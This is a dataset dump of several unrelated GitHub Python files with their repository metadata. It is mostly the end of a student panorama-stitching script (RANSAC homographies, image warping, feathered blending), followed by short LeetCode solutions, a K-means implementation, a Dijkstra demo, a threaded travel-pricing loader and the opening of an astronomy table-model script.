transformed by H. \n Return an array of errors for all points\"\"\"\n \n num_matches = len(all_matches)\n \n X = all_matches[:,0].reshape(-1, 1)\n Y = all_matches[:,1].reshape(-1, 1)\n u = all_matches[:,2].reshape(-1, 1)\n v = all_matches[:,3].reshape(-1, 1)\n \n # all matching points in source image\n all_p1 = np.concatenate((X, Y, np.ones((len(all_matches),1))), axis = 1)\n \n # all matching points in template image\n all_p2 = np.concatenate((u, v), axis = 1)\n \n # Transform every point in p1 to estimate p2\n estimate_p2homogeneous = H @ all_p1.T\n \n estimate_p2euclidean = (estimate_p2homogeneous/(estimate_p2homogeneous[-1]))[0:2]\n \n # Compute error of each matching pair\n errors = np.linalg.norm(all_p2 - estimate_p2euclidean.T, axis = 1) \n \n return errors\n\n\n# In[7]:\n\n\ndef GetHomographyRANSAC(match_coords):\n \n \"\"\"Function that computes linear (2D) Homography Calibration, implementing RANSAC\n for eliminating outliers and align correspondent matches. The main output concerns \n a single transformation H that gets the most inliers in the course of all the \n iterations. \n \n Args:\n match_coords(numpy.ndarray): In dims (#matched pixels, 4).\n\n Returns:\n H(numpy.ndarray): Homography matrix, dims (3, 3).\n \"\"\"\n \n global MAX_ITER, threshold_error\n \n N = 4 # four matches to initialize the homography in each iteration\n \n max_inliers = 0 \n \n # RANSAC procedure \n for itr in range(MAX_ITER): \n # Randomly select 4 matched pairs\n idx_rand_inliers = random.sample(range(match_coords.shape[0]), N)\n \n selected_matches = match_coords[idx_rand_inliers, :]\n \n # compute the homography H by DLT from the N = 4 matched pairs \n H = FitHomography(selected_matches)\n \n # Find inliners \n errors = get_errors(match_coords, H)\n \n idx_inliers = np.where(errors < threshold_error)[0]\n \n num_inliers = len(idx_inliers) \n \n # Analise current solution, and if it contains the maximum number of inliers\n # amongst all homographies until now fitted, save the current inliers for \n # further refinement of the homography in the last step \n \n if num_inliers > max_inliers:\n max_inliers = num_inliers\n best_inliers = match_coords[idx_inliers]\n \n # compute the homography H by DLT from best_inliers \n H = FitHomography(best_inliers, max_inliers)\n \n return H\n\n\n# In[8]:\n\n\ndef compute_H_wrt_reference(H_all, ref_image):\n \"\"\"\n Function that computes new homographies H_map that map every other image *directly* to\n the reference image by composing H matrices in H_all. \n The homography in H_map that is associated with the reference image\n should be the identity matrix, created using eye(3). The homographies in\n H_map for the other images (both before and after the reference image)\n are computed by using already defined matrices in H_map and H_all. \n\n Args: \n H_all(cell array) \n\n ref_image(int): index of the reference image (the first image has index 1)\n\n\n Returns:\n H_map(cell array): 3x3 homographies matrices that map each image into the reference image's\n coordinate system.\n\n \"\"\"\n num_imgs = len(H_all)+1\n \n H_map = {}\n \n key = \"H{}{}\".format(ref_image-1, ref_image-1) \n H_map[key] = np.eye(3)\n \n for i in range(0, ref_image-1): \n key = \"H{}{}\".format(i, ref_image-1) \n H_aux = np.eye(3)\n \n j = i\n \n while j < ref_image - 1:\n key_t = \"H{}{}\".format(j, j+1)\n H_aux = H_all[key_t] @ H_aux\n j += 1 \n \n H_map[key] = H_aux\n \n for i in range(ref_image, num_imgs):\n key = \"H{}{}\".format(i, ref_image-1) # H10\n H_aux = np.eye(3)\n \n j = i -1 \n \n while j>= ref_image-1:\n key_t = \"H{}{}\".format(j, j+1)\n H_inv = np.linalg.inv(H_all[key_t])\n H_aux = H_inv/H_inv[2,2] @ H_aux\n j -= 1\n \n H_map[key] = H_aux\n \n return H_map \n\n\n# In[9]:\n\n\ndef Check_Homography(H):\n \"\"\"\n Check if homography is reasonable, according to certain criteria:\n - If the determinant of the homography det(H) is very close to 0, H is \n close to singular;\n \n - If condition number of H (ratio of the first-to-last singular value) is\n infinite, the matrix H is singular, and if it is too large, H is \n ill-conditioned. In non-mathematical terms, an ill-conditioned problem \n is one where, for a small change in the inputs, there is a large \n change in the output, that is, H is very sensitive to changes or errors \n in the input. This means that the correct solution/answer to the \n equation becomes hard to find;\n \n - If det(H) < 0, the homography is not conserving the orientation, \n being orientation-reversing. This is not suitable, except if we are \n watching the object in a mirror. Nevertheless, sift/surf descriptors \n are not done to be mirror invariant, so if it was the case we would \n probably not have good maches. \n \n An exactly singular matrix means that it is not invertible. If the above \n criteria is verified, more pratically the matrix H is non-invertible. \n In the context of homographies, it means that points in one 2D image are mapped\n to a less-than-2D subspace in the other image (a line, a point).A \n nearly singular matrix is indicative of a rather extreme warp. \n \"\"\"\n \n #Conditions to accertain that the resultant homography H is free of \n #singularities. If one of the condition is satisfied, the Homography H from \n #image space to reference image space is not reasonable, according \n #to the defined criteria \n if np.linalg.det(H) < 1 and np.linalg.cond(H[0:2, 0:2]) > 2:\n \n # In the condition number, only the top-left 2x2 matrix is considered, \n # thus omitting the z-dependence of the transformation, which should be \n # irrelevant because we know that z will always be fixed to 1 on the input\n \n H = np.zeros((3,3))\n \n return H\n\n\n# In[10]:\n\n\ndef get_blank_canvas(H_warp, ind_image_warp, image_paths, ref_img):\n \"\"\"\n Function that computes the size of the panorama using forward warping. Before warping \n each of the images, the size of the output panorama image is computed and \n initialized from the range of warped image coordinates for each input image.\n \"\"\"\n \n num_imgs = len(H_warp)\n \n # Initialize the limits of the output panorama image\n min_crd_canvas = np.array([np.inf, np.inf])\n max_crd_canvas = np.array([-np.inf, -np.inf])\n \n limits_all = []\n \n # mapping the coordinates of the four corners from each source image using forward warping to determine its coordinates in \n # the output image. \n \n for i in range(num_imgs):\n ind_image = ind_image_warp[i]\n \n image = img.imread(image_paths[ind_image])\n img_h, img_w, _ = image.shape\n \n key = \"H{}{}\".format(ind_image, ref_img-1)\n H = H_warp[key]\n \n # create a matrix with the coordinates (homogeneous) of the four corners \n # of the current image\n corners_img = np.array([[0, 0, 1], [0, img_h,1], [img_w, img_h,1], [img_w, 0,1]])\n \n # Map each of the 4 corner's coordinates into the coordinate system of\n # the reference image\n canvas_crd_corners = H @ corners_img.T\n canvas_crd_corners = (canvas_crd_corners / canvas_crd_corners[-1, :])[0:2, :]\n \n limits_all.append(canvas_crd_corners.T)\n \n # Limits of the current warped image \n min_crd_canvas_cur = np.amin(canvas_crd_corners.T, axis=0) # min_x, min_y\n max_crd_canvas_cur = np.amax(canvas_crd_corners.T, axis=0) # max_x, max_y\n \n # Update the limits of the output image \n min_crd_canvas = np.floor(np.minimum(min_crd_canvas_cur, min_crd_canvas)) # min_x, min_y\n max_crd_canvas = np.ceil(np.maximum(max_crd_canvas_cur, max_crd_canvas)) # max_x, max_y\n \n # Compute output image size \n min_x = min_crd_canvas[0]\n max_x = max_crd_canvas[0]\n min_y = min_crd_canvas[1]\n max_y = max_crd_canvas[1]\n \n width_canvas = max_x - min_x + 1\n height_canvas = max_y - min_y + 1\n \n # output image array initialized to all black pixels\n canvas_img = np.zeros((int(height_canvas), int(width_canvas), 3), dtype=np.int64)\n \n # Compute offset of the upper-left corner of the reference image relative\n # to the upper-left corner of the output image\n offset = min_crd_canvas.astype(np.int64) # [x_offset, y_offset]\n \n # Find limits of panorama\n lims = np.concatenate(limits_all,axis=0)\n \n for i in range(int(lims.shape[0]/4)):\n lims_i = np.concatenate((lims[4*i:4 + 4*i], lims[None, 4*i, :]), axis = 0)\n plt.plot(lims_i[:, 0], -lims_i[:,1])\n\n plt.show()\n\n return canvas_img, offset\n\n\n# In[11]:\n\n\ndef image_warping(panorama_height, panorama_width, offset, H, img):\n \"\"\"\n Function that warps every input image on to the panorama, using inverse warping\n to map each pixel in the output image into the planes defined by the source images. \n If forward warping was used to map every pixel from each source image, there will \n be holes (i.e., some pixels in the output image will not be assigned an RGB \n value from any source image, and remain black) in the final output image.\n \"\"\"\n \n x_offset = -offset[0]\n y_offset = -offset[1]\n \n # Create a list of all pixels' coordinates in output image\n x,y = np.meshgrid(range(panorama_width), range(panorama_height))\n \n # Create homogeneous coordinates for each pixel in output image, considering \n # the translation offset vector \n x_coords = x.flatten().reshape(1,-1) - x_offset\n y_coords = y.flatten().reshape(1,-1) - y_offset\n \n grid_coords = np.concatenate((x_coords, y_coords, np.ones((1, x_coords.shape[1]))))\n \n # Perform inverse warp to compute coordinates in current input image\n image_coords = np.linalg.solve(H, grid_coords)\n \n # To get the warped coordinates, we must divide the first and second coordinates by \n # z to obtain the new x and y (euclidean coordinates)\n z = image_coords[None, 2, :] \n warp_coords = image_coords[0:2, :]/np.concatenate((z,z))\n \n # Reshape the pixel grid to have the same size as the panorama \n x_warp = np.reshape(warp_coords[None, 0, :], (panorama_height, panorama_width))\n y_warp = np.reshape(warp_coords[None, 1, :], (panorama_height, panorama_width))\n # Note: Some values will return as NaN (\"not a number\") because they\n # map to points outside the domain of the input image\n \n # Warped Image array that will contain RGB color maps obtained through inverse \n # mapping \n I_WarpColorMaps = np.zeros((panorama_height, panorama_width, 3))\n \n # Color interpolation, by sampling a color value for each pixel in source image. \n # By doing this we won't have any black pixels or gaps in the warpped image, \n # (a kind of undersampling artifact)\n \n for channel in range(3):\n # When mapping pixel locations, some pixels in the output warped image will not \n # map to a pixel in a given source image because the output pixel’s coordinates \n # map outside the domain of the source image. For solving this, we use bilinear \n # interpolation (order = 1) for assigning the color value in the warped image\n \n I_WarpColorMaps[:, :, channel] = scipy.ndimage.map_coordinates(img[:, :, channel].astype(float), [y_warp, x_warp], order = 1)\n \n # color pixel warping, by converting I_WarpColorMaps into an unsigned 8-bit integer, \n # with the elements of an uint8 ranging from 0 to 255\n warped_image = I_WarpColorMaps.astype('uint8')\n\n return warped_image\n\n\n# In[12]:\n\n\ndef alpha_channel(img, epsilon=0.001):\n \"\"\"\n Function that computes the alpha channel of an RGB image.\n\n Args:\n img is an RGB image. \n\n epsilon (float): value to guarantee that the alpha channel has non-zero\n values, otherwise a division-by-zero error will be encounter \n when performing blending \n \n Returns:\n im_alpha has the same size as im_input. Its intensity is between\n epsilon and 1, inclusive.\n \"\"\"\n \n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # binary image that has 1s within the warped image and 0s beyond the edges of \n # the warped image \n im_bw = cv2.threshold(img_gray, 0.5, 255, cv2.THRESH_BINARY)[1]\n \n # alpha channel where the value of alpha for the input image is 1 at its \n # center pixel and decreases linearly to epsilon at all the border pixels\n im_alpha = scipy.ndimage.distance_transform_edt(im_bw)\n \n # normalize the distances to be in the interval [epsilon, 1].\n im_alpha = (im_alpha+epsilon)/np.max(im_alpha) \n \n return im_alpha\n\n\n# In[16]:\n\n\ndef blending(img1, img2):\n \"\"\"\n Function that blends two warped images together, overlapping pixel color values. \n The simplest way to create a final composite is by averaging the pixel values \n where the two images overlap, or by using the pixel values from one of the \n images.\n Simple averaging usually does not work very well, since exposure differences, ´\n misregistrations, and scene movement are all very visible. \n A better approach to averaging is to weight pixels near the center of the \n image more heavily and to down-weight pixels near the edges, being this \n enconded into a alpha channel. \n This is called feathering (Section 9.3.2 in the Szeliski book)\n\n Each pixel (x, y) in image Ii is represented as \n Ii(x, y) = (αi*R, αi*G, αi*B, αi) where (R,G,B) are the color values at the \n pixel and αi its alpha channel \n \n Pixel value of (x, y) in the stitched output image is computed has:\n [(α1*R, α1*G, α1*B) + (α2*R, α2*G,α2*B) ] / (α1+α2).\n\n Args:\n img1 and img2 are both RGB images of the same size, having \n been warped to the same coordinate frame \n \n Output:\n im_blended has the same size and data type as the input images\n\n \"\"\"\n \n if feathering:\n # alpha channel that contains weights for blending the images \n alpha1 = alpha_channel(img1)\n alpha2 = alpha_channel(img2)\n \n im_blended = np.zeros(img1.shape)\n \n red_blending = (alpha1 * img1[:, :, 0] + alpha2 * img2[:,:,0])/(alpha1 + alpha2)\n green_blending = (alpha1 * img1[:, :, 1] + alpha2 * img2[:,:,1])/(alpha1 + alpha2)\n blue_blending = (alpha1 * img1[:, :, 2] + alpha2 * img2[:,:,2])/(alpha1 + alpha2)\n \n im_blended[:,:,0] = red_blending \n im_blended[:,:,1] = green_blending \n im_blended[:,:,2] = blue_blending\n \n # convert into an unsigned 8-bit integer, for the values of each channel to\n # range from 0 to 255\n im_blended = im_blended.astype('uint8')\n \n else:\n # average blending \n \n mask_a = cv2.cvtColor(img1, cv2.COLOR_RGB2GRAY)\n mask_b = cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY)\n \n a_and_b = cv2.bitwise_and(mask_a, mask_b)\n overlap_area_mask = cv2.threshold(a_and_b, 1, 255, cv2.THRESH_BINARY)[1]\n \n overlap_pixels = (cv2.bitwise_and(img1, img1, mask = overlap_area_mask.astype('uint8')) + cv2.bitwise_and(img2, img2, mask = overlap_area_mask.astype('uint8')))/2\n \n im_blended = cv2.bitwise_and(img1, img1, mask = np.logical_not(overlap_area_mask).astype('uint8')) + cv2.bitwise_and(img2, img2, mask = np.logical_not(overlap_area_mask).astype('uint8')) + overlap_pixels\n \n im_blended = im_blended.astype('uint8')\n \n return im_blended\n\n\n# In[13]:\n\n\ndef pivproject2022_task2_plus(ref_image, path_to_input_folder, path_to_output_folder, extract_sift, subsampling, cv2WarpPerspective, feathering):\n \"\"\"\n Compute the homographies between images in a directory and a reference image\n\n ref_image: integer with index number of the frame that will be the reference \n image. First image is index=1. Ideally, the one in the middle of the sequence \n of input images so that there is less distortion resulting mosaic.\n \n path_to_input_folder: string with the path to the input folder, where input images \n and keypoints are stored. Images are named rgb_number.jpg \n (or rgb_number.png) and corresponding keypoints are named \n rgbsift_number.mat\n\n \n path_to_output_folder: string with the path where homographies with respect to the reference\n image are stored\n\n \"\"\"\n \n # Check if path_to_input_folder was passed. If not, \"No_path\" is assigned\n if not('path_to_input_folder' in locals()):\n path_to_input_folder = \"No_path\";\n \n # Check if output directory exists. If not, output directory is created \n if not(os.path.isdir(path_to_output_folder)):\n os.mkdir(path_to_output_folder)\n \n # Get input rgb images\n rgb_paths = []\n sift_paths = []\n \n for im_path in glob.glob(path_to_input_folder+'/*.jpg'):\n rgb_paths.append(im_path)\n \n if len(rgb_paths) == 0:\n print('ERROR: In the specified path there aren\\'t image input files')\n return \n \n else: \n #Ordering the rgb_paths array, in such a way that consecutive frames follow \n #each other \n image_paths = sorted(rgb_paths) \n \n if not(extract_sift):\n print('Searching for sift .mat files')\n \n for im_path in glob.glob(path_to_input_folder+'/*.mat'):\n sift_paths.append(im_path)\n \n if len(sift_paths) != 0:\n \n sift_paths_ordered = sorted(sift_paths)\n \n else:\n extract_sift = True\n print('In the specified path there aren\\'t sift input files. Thus, a sift function will be used to extract matching points')\n\n # Get Reference image\n try: \n reference_image = img.imread(image_paths[ref_image - 1])\n \n except:\n print('ERROR: The index for the reference image is out of bounds. Please select an index between 1 and %d' % (len(rgb_paths)))\n return\n \n H_all = {}\n \n # compute homography matrices between adjacent input images. Homography matrices \n # between adjacent input images are then stored in a cell array H_all.\n \n for i in range(len(image_paths)-1):\n image_1_path = image_paths[i]\n image_2_path = image_paths[i+1]\n \n print(\"Processing {} & {}\".format(image_1_path, image_2_path))\n \n image_1 = img.imread(image_1_path)\n image_2 = img.imread(image_2_path)\n \n if extract_sift:\n sift_path1 = None\n sift_path2 = None\n \n else:\n sift_path1 = sift_paths_ordered[i]\n sift_path2 = sift_paths_ordered[i+1]\n \n key = 'H{}{}'.format(i, i+1)\n \n #try:\n # coordinates of the matches between image and template\n m_coords_img, m_coords_temp = siftMatch(image_1, image_2, sift_path2, sift_path1, N = 4)\n match_coords = np.append(m_coords_img, m_coords_temp, axis = 1)\n #except:\n # print('ERROR: check format of directory, as OpenCV only accepts ASCII characters for image paths')\n # return \n \n try:\n threshold_error = 4\n \n H_all[key] = GetHomographyRANSAC(match_coords)\n \n except: \n print('ERROR: RANSAC failed to compute homography. Check if there are enough matching keypoints.')\n \n \n # Compute new homographies H_map that map every other image *directly* to\n # the reference image \n H_map = compute_H_wrt_reference(H_all, ref_image)\n \n \n H_warp = {} # cell array that will contain the reasonable homographies between images and reference image, \n # so that only these images are warped \n \n ind_image_warp = [] # list that will contain the index of the images that will be warped \n \n for i in range(len(H_map)):\n key = \"H{}{}\".format(i, ref_image-1)\n H = H_map[key]\n \n print(\"image \"+str(i))\n print(\"np.linalg.det(H):\", np.linalg.det(H)) \n print(\"np.linalg.cond(H[0:2, 0:2]):\", np.linalg.cond(H[0:2, 0:2]))\n \n H = Check_Homography(H)\n\n if np.array_equal(H, np.zeros((3,3))):\n print(\"H{}{} is not reasonable\".format(i, ref_image-1))\n else:\n print(\"H{}{} is reasonable\".format(i, ref_image-1))\n H_warp[key] = H\n ind_image_warp.append(i)\n\n # saving homographies with respect to the reference image \n file_name = os.path.split(image_paths[i])[1]\n H_output_path = path_to_output_folder + '/' + 'H_' + file_name[4:8] + '.mat'\n scipy.io.savemat(H_output_path, {'H':H})\n \n canvas_img, offset = get_blank_canvas(H_warp, ind_image_warp, image_paths, ref_image)\n \n panorama_height, panorama_width, _ = canvas_img.shape\n \n # cell array that contains warped input images on the output canvas panorama \n warped_images = {}\n \n for i in range(len(H_warp)):\n ind_image = ind_image_warp[i]\n \n key = \"H{}{}\".format(ind_image, ref_image-1)\n H = H_warp[key]\n \n image = cv2.imread(image_paths[ind_image])\n \n if cv2WarpPerspective:\n # Combine homography with the translation offset vector \n translation_mat = np.array([[1, 0, -offset[0]], [0, 1, -offset[1]], [0, 0, 1]])\n H = np.dot(translation_mat, H)\n warped_images[i] = cv2.warpPerspective(image, H, (canvas_img.shape[1], canvas_img.shape[0]), flags = cv2.INTER_NEAREST)\n \n else:\n warped_images[i] = image_warping(panorama_height, panorama_width, offset, H, image)\n \n # Initialize output image to black (0)\n panorama_image = np.zeros((panorama_height, panorama_width,3))\n \n panorama_image = warped_images[0] \n \n for i in range(1,len(warped_images)):\n panorama_image = blending(np.float32(panorama_image), np.float32(warped_images[i]))\n \n plt.title(\"Panorama\")\n plt.imshow(panorama_image)\n plt.show()\n \n # saving mosaic\n image_output_path = path_to_output_folder + '/mosaic_' + str(ref_image) + '.png'\n cv2.imwrite(image_output_path, panorama_image)\n \n\n\n# In[14]:\n\n\nref_image = int(sys.argv[1])\npath_to_input_folder = sys.argv[2]\npath_to_output_folder = sys.argv[3]\n\nextract_sift = int(sys.argv[4]) # variable that defines if the extraction of sift keypoints and descriptors is to \n # be performed (set to 1, 0 otherwise)\n\nsubsampling = int(sys.argv[5]) # variable that defines if subsampling of the source image \n # descriptors is to be performed (set to 1, 0 otherwise), when \n # performing the matching \n \ncv2WarpPerspective = int(sys.argv[6]) # variable that defines if image warping is to be performed by \n # cv2WarpPerspective built-in function (set to 1) or a function \n # developed by the group (set to 0) \n\nfeathering = int(sys.argv[7]) # variable that defines if feathering is going to be performed (set to 1) or not \n # (set to 0) not for blending the warped images \n\n\n# In[48]:\n\n\npivproject2022_task2_plus(ref_image, path_to_input_folder, path_to_output_folder, extract_sift, subsampling, cv2WarpPerspective, feathering)\n\n","repo_name":"marianamourao-37/Image-Processing-and-Vision","sub_path":"panorama/pivproject2022_task2_plus.py","file_name":"pivproject2022_task2_plus.py","file_ext":"py","file_size_in_byte":33577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18952543255","text":"\"\"\"\nGiven an integer, write a function to determine if it is a power of two.\n\"\"\"\n\n# import math\n\n# def isPowerOfTwo(n):\n# return n > 0 and math.log2(n) % 1 == 0\n# print(isPowerOfTwo(64))\n\ndef isPowerOfTwo(n):\n i = 0\n while i < n:\n if n == pow(2, i):\n return True\n i += 1\n return False","repo_name":"sshantel/leetcode","sub_path":"231_power_of_two.py","file_name":"231_power_of_two.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18532661163","text":"def push_up(tree, rt):\n tree[rt] = tree[rt<<1] + tree[rt<<1 | 1]\n \n\ndef build(tree, data, l, r, rt):\n if l == r:\n tree[rt] = data[l]\n return\n m = (l+r)>>1\n build(tree, data, l, m, rt<<1)\n build(tree, data, m+1, r, rt<<1 | 1)\n push_up(tree, rt)\n \n\ndef get_idx(begin, end, pos):\n l = begin\n r = end\n rt = 1\n while l < r:\n m = (l+r) >> 1\n if pos > m:\n l = m+1\n rt = rt<<1 | 1\n else:\n r = m\n rt = rt<<1\n return rt\n\n\ndef query_iter(tree, l, r, lq, rq, rt):\n if (lq <= l and rq >= r):\n return tree[rt]\n m = (l+r)>>1\n ans = 0\n if (m >= lq):\n ans += query_iter(tree, l, m, lq, rq, rt<<1)\n if (m < rq):\n ans += query_iter(tree, m+1, r, lq, rq, rt<<1 | 1)\n return ans\n\n\nclass NumArray:\n\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n if nums:\n nums = [0] + nums\n self.tree = [0] * (len(nums)*4)\n self.length = len(nums)-1\n build(self.tree, nums, 1, len(nums)-1, 1)\n \n\n def update(self, i, val):\n \"\"\"\n :type i: int\n :type val: int\n :rtype: void\n \"\"\"\n rt = get_idx(1, self.length, i+1)\n self.tree[rt] = val\n p = rt >> 1\n while p:\n push_up(self.tree, p)\n p = p >> 1\n \n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n return query_iter(self.tree, 1, self.length, i+1, j+1, 1)\n \n\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# obj.update(i,val)\n# param_2 = obj.sumRange(i,j)\n","repo_name":"monlie/LeetCode","sub_path":"307.py","file_name":"307.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17155246745","text":"# load the dependancies\nfrom kaptiorestpython.client import KaptioClient\nfrom kaptiorestpython.utils_kaptio import load_kaptioconfig\nfrom utils import get_pickle_data, save_pickle_data, save_json, scanfiles, copy_pickles\nimport json\nfrom time import time\nfrom datetime import datetime\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass ThreadWorker(Thread):\n def __init__(self, kt, job_queue, result_queue, savepath):\n Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.kt = kt\n self.savepath = savepath\n self.job_queue = job_queue\n self.result_queue = result_queue\n\n def run(self):\n i = 0\n while True:\n # Get the work from the queue and expand the tuple\n p = self.job_queue.get()\n i += 1\n if i % 100 == 0:\n logger.info(\"Processing {}\".format(i))\n \n try:\n packageid = p.get('packageid')\n tax_profiles = p.get('tax_profiles')\n occupancy = p.get('occupancy')\n services = p.get('services')\n dates = p.get('dates')\n currency = p.get('currency', 'CAD')\n channelid = p.get(\"channelid\")\n\n data = self.kt.process_package_prices(\n savepath=self.savepath, \n packageid=packageid, \n dates=dates, \n tax_profiles=tax_profiles, \n occupancy=occupancy, \n services=services,\n currency=currency,\n channelid=channelid\n )\n\n #self.logger.info(data)\n \n p['pricelist'] = data\n self.result_queue.put(p)\n\n finally:\n self.job_queue.task_done() \n\ndef process_price_parallel(config, data, kt, savepath):\n if not data:\n data = {}\n\n job_queue = Queue()\n result_queue = Queue()\n\n package_field = 'packages'\n key_field = 'package_pricelist'\n\n logger.info(\"loading prices...\")\n\n reload = config.get('flags', {}).get('switches', {}).get('reload')\n currency=config.get(\"presets\", {}).get(\"currency\", \"CAD\")\n try:\n max_threads = int(config.get(\"presets\", {}).get(\"threads\", 5))\n except:\n max_threads = 5\n\n channelid=None\n for c in data.get(\"channels\",[]):\n if c.get(\"id\") == config.get(\"presets\", {}).get(\"channelid\") or \\\n c.get(\"name\") == config.get(\"presets\", {}).get(\"channelname\") or \\\n c.get(\"code\") == config.get(\"presets\", {}).get(\"channelcode\"):\n logger.info(\"Matched channeldata {} => {}\".format(c.get(\"name\"), c.get(\"id\")))\n channelid = c.get(\"id\")\n break\n \n if not channelid:\n logger.error(\"Failed to match channelid {}\".format(config.get(\"presets\", {}).get(\"channelid\")))\n raise Exception(\"Failed to match channelid {}\".format(config.get(\"presets\", {}).get(\"channelid\")))\n \n limit_run = int(config.get(\"presets\", {}).get(\"limit_run\",0))\n added = 0\n for p_value in data.get(package_field, []):\n #logger.info(\"p_value: {}\".format(p_value))\n if p_value.get(key_field, []):\n if not reload:\n continue\n p_key = p_value.get('id')\n\n if not p_value.get('active'):\n if not p_key in config.get('packages',[]): \n continue\n logger.info('\\tIncluding deactive package {}'.format(p_key))\n \n dates = []\n for d in p_value.get('package_dates', []):\n dates.append(d)\n\n if len(dates) == 0:\n for d in p_value.get('dates', []):\n dates.append(d)\n\n if len(dates) == 0:\n for d in p_value.get('package_departures', []):\n if d.get('active'):\n dates.append(d.get('date'))\n\n run_data = {\n \"packageid\": p_key,\n \"dates\": dates,\n \"tax_profiles\": data.get('tax_profiles', {}),\n \"occupancy\": data.get('occupancy', {}),\n \"services\": p_value.get('service_levels' ,{}),\n \"currency\": currency,\n \"channelid\": channelid\n }\n\n job_queue.put(run_data)\n if limit_run > 0:\n added += 1\n if added > limit_run:\n logger.info(\"Run limit hit: {}\".format(limit_run))\n break\n \n for _ in range(max_threads):\n worker = ThreadWorker(kt, job_queue, result_queue, savepath)\n # Setting daemon to True will let the main thread exit even though the workers are blocking\n worker.daemon = True\n worker.start()\n\n # now to wait for the results...\n logger.info(\"Queue loaded... waiting to finish processing\")\n job_queue.join()\n\n if not data.get('pricelist'):\n data['pricelist'] = {}\n\n # now to get teh results\n logger.info(\"Process complete... reading data\")\n while True:\n # do stuff with job\n # Get the work from the queue and expand the tuple\n try:\n run_data = result_queue.get(False)\n packageid = run_data.get(\"packageid\")\n if not data.get('pricelist', {}).get(packageid):\n data['pricelist'][packageid] = {}\n \n data['pricelist'][packageid]['pricelist'] = run_data.get('pricelist')\n \n except Empty:\n break\n\n logger.info(\"Processed {} pricelist\".format(len(data.get('pricelist'))))\n\n return data","repo_name":"Dreffed/Kaptio_API","sub_path":"utils_parallel.py","file_name":"utils_parallel.py","file_ext":"py","file_size_in_byte":5696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18147259657","text":"import numpy as np\r\n\r\nclass KMeans(object):\r\n \"\"\"\r\n K均值实��\r\n \"\"\"\r\n def __init__(self,k) -> None:\r\n \"\"\"\r\n 参数:\r\n k (int): 分类数量\r\n \"\"\"\r\n self.k = k\r\n\r\n def fit(self, X):\r\n k = self.k\r\n size = X.shape[0]\r\n dim = X.shape[1]\r\n new_centers = np.zeros((k, dim))\r\n centers = np.zeros((k, dim))\r\n dis = np.zeros((size, k))\r\n y = np.zeros(size, dtype=np.int)\r\n \r\n # 随机初始点很重要\r\n for i in range(k):\r\n center_idx = np.random.randint(low=0, high=size, size=1)[0]\r\n centers[i] = X[center_idx]\r\n\r\n while True:\r\n for i in range(k):\r\n dis[:, i] = np.sum((X - centers[i])**2, axis=1)\r\n\r\n y = np.argmin(dis, axis=1)\r\n\r\n for i in range(k):\r\n choose_x = X[y == i]\r\n\r\n if choose_x.size != 0:\r\n new_centers[i] = np.mean(choose_x, axis=0)\r\n else:\r\n new_centers[i] = centers[i]\r\n\r\n gap = np.sum((centers - new_centers)**2)\r\n\r\n centers = new_centers\r\n\r\n if gap < 1e-6:\r\n break\r\n\r\n return centers, y\r\n\r\n\r\n def compute_err(self, centers, X, y):\r\n return np.mean(np.sum((X - centers[y])**2, axis=1))","repo_name":"WArewh/college","sub_path":"ai/foundation_technique/hw8/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43040804797","text":"#!/usr/bin/env python\n\"\"\"dijkstra.py: all_pairs_dijkstra_path demonstration\n\"\"\"\n\nimport networkx as nx\nfrom networkx.algorithms.connectivity.edge_augmentation import one_edge_augmentation\n#from networkx.algorithms.shortest_paths.weighted import all_pairs_dijkstra_path_length\n\n# Make a graph.\nG = nx.DiGraph()\n\n# Define edges with weights.\nG.add_weighted_edges_from(\n ((0, 1, 10.0),\n (0, 2, 14.0),\n (0, 3, 12.0),\n (1, 2, 8.0),\n (1, 4, 19.0),\n (2, 3, 7.0),\n (2, 5, 22.0),\n (3, 5, 21.0),\n (4, 5, 11.0),))\n\n# Compute the shortest path lengths between all nodes in graph G.\n\n# 全てのペアに対して最短距離を検索\nall_pairs = nx.all_pairs_dijkstra_path_length(G)\n\n# ターゲットとゴールを指定した1ペアに対して最短距離を検索\nshortest_pairs = nx.single_source_dijkstra(G, 0, 5)\n\n# all_pairsの使い方\nfor source, mapping in all_pairs:\n for target in mapping.keys():\n if source != target:\n dist = mapping[target]\n print(f\"({source}, {target}): {dist:4.1f}\")","repo_name":"batamorphism/coding","sub_path":"Python/重要な奴/ふるい/ダイクストラ.py","file_name":"ダイクストラ.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40015307907","text":"# Create XSPEC/Sherpa style table models\n#\n# Used in:\n#\n# You et al. (2015), ApJ submitted, arXiv:1506.03959\n# Adhikari et al. (2016), in preparation\n#\n# table_model\n# Create Xspec/Sherpa style table model\n#\n# read_userparams\n# Read model parameters from a file provided by the user\n#\n# get_paramval\n# Find combinations of model paramaters corresponding to the input\n# spectra\n#\n# read_input_spectra\n# Read grid of model spectra from a file prvided by the user\n\n\nfrom astropy.io import fits\nimport numpy as np\nimport os\n\ndef table_model(modelname, userparfile, specfile, outfile,\n clobber=False):\n \n# Create Xspec/Sherpa style table model\n#\n# :rtype: None, fits file created.\n#\n# :param modelname: name of the table model displayed in Xspec/Sherpa\n# :param userparfile: file with user keywords for the table model\n# :specfile: file with grid of energy spectra, 1st column: energy grid\n# in keV; consecutive columns: model spectra\n# :param outfile: name of the output fits file\n# :param clobber: T/F, if T outfile will be overwritten\n#\n# Tmp file 'tmp_tabmod.fits' created and removed.\n\n# ----------- READ IN USER 